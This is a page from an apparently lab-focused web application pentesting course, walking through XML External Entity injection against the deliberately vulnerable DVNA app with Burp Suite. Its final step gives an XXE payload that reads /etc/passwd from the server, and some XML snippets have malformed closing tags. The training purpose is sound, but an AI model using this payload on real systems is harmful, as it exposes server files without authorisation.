infosecgirls
Appsec
Appsec
  • Introduction
  • Application Details
    • VM - Pre-req
    • Import Virtual Machines
    • Access Mutillidae Web Application
  • INITIAL SETUP WITH OWASP ZAP
    • OWASP ZAP
    • Setup OWASP ZAP
    • Modes
    • Automated Scan
    • Report Generation
  • Initial Setup with Burp
    • Start Burp Suite
    • Add FoxyProxy Addon
    • Add New Proxy In FoxyProxy
    • Configure Proxy Listener
    • Install Burp's CA Certificate In Firefox
    • Getting Rid of Unnecessary Browser Traffic
  • Quick Basics
    • Disable Intercept Mode in Burp
    • Enable Intercept Mode in Burp
    • Send to Repeater
    • Send to Comparer
  • Web Application Pentesting
    • A1 - Injection
      • SQL Injection with bWAPP
      • SQL Injection in DVNA
      • Command Injection in DVNA
    • A2 - Broken Authentication
      • Broken Authentication with bWAPP
    • A3 - Sensitive Data Exposure
      • Sensitive Data Exposure - DVNA
    • A4 - XML External Entities (XXE)
      • XML External Entity (XXE) Injection - Mutillidae
      • XML External Entity (XXE) Injection - DVNA
    • A5 - Broken Access Control
      • Broken Access Control - DVNA
    • A6 - Security Misconfiguration
      • Security Misconfiguration in DVNA
      • Security Misconfiguration in Mutillidae
      • Security Misconfiguration in Security Shepherd
    • A7 - Cross-Site Scripting (XSS)
      • Reflected XSS
      • DOM XSS
      • Stored XSS - Mutillidae
      • XSS - Sending data to remote server
    • A8 - Insecure Deserialization
      • Insecure Deserialization - DVNA
    • A9 - Using Components with Known Vulnerabilities
      • Using Components with Known Vulnerabilities - DVNA
    • 10 - Insufficient Logging & Monitoring
    • References
    • About Us
  • Additional Content
    • Insecure Direct Object Reference
    • Security Misconfiguration
    • Password Guessing Attack
    • User Enumeration
      • Unauthenticated User Access
      • Create a New User
      • Authenticated User Access
      • Intruder: Set Positions
      • Intruder: Define Payload
      • Intruder: Configure Grep - Extract
      • Trigger Attack & Save Results
    • Custom Iterator
    • Null Payload
    • Request in Browser: Privilege Escalation Check
  • Burp Extenders
    • Target
    • Proxy
    • Intruder
    • Repeater
    • Sequencer
    • Decoder
    • Comparer
    • Extender
Powered by GitBook
On this page

Was this helpful?

  1. Web Application Pentesting
  2. A4 - XML External Entities (XXE)

XML External Entity (XXE) Injection - DVNA

PreviousXML External Entity (XXE) Injection - MutillidaeNextA5 - Broken Access Control

Last updated 4 years ago

Was this helpful?

DVNA - Damn Vulnerable Node Application

Step 1: Navigate to"A4: XML External Entities" > XXE: ImportProducts.

Notice that "Bulk Import Products" feature has a file upload functionality

Step 2: Let's upload valid, benign XML file and observe the application behaviour. Save the following XML snippet into the file and save it with .xml extension and upload it using "Bulk Import Products" feature. Intercept the POST request made using Burp

<products>
    <product>
        <name>Xbox One</name>
        <code>23</code>
        <tags>gaming console</tags>
        <description>Gaming console by Microsoft</description>
    </product>
    <product>
        <name>Playstation 4</name>
        <code>26</code>
        <tags>gaming console</tags>
        <description>Gaming console by Sony</description>
    </product>
</products

Step 3: Send the intercepted request to Burp Repeater(CTRL+R) and navigate to repeater(CTRL+SHIFT+R)

Step 4: Forward the request in repeater and follow redirection. notice that the XML is parsed and the application created a table with the XML data provide

Step 5: Let's check if the XML parser allows external entity expansion. In the request body of the POST request in the repeater, modify the XML payload to the following. Forward the request and follow redirection. Notice that the XML parser expanded the entity and the product description is updated

<!DOCTYPE test [<!ENTITY desc "I love this product!">]>
<products>
    <product>
        <name>Television</name>
        <code>100</code>
        <tags>entertainment</tags>
        <description>&desc;</description>
    </product>
</product

Step 6: Let's use an XML external entity to read files on the remote server. In the request body of the POST request in the repeater, modify the XML payload to the following. Forward the request and follow redirection. Notice that the XML parser processed the external entity and the product description is updated with contents of /etc/passwd on the remote server where the XML parser is running

<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY bar SYSTEM "file:///etc/passwd" >]>
<products>
   <product>
      <name>Playstation 4</name>
      <code>274</code>
      <tags>gaming console</tags>
      <description>&bar;</description>
   </product>
</products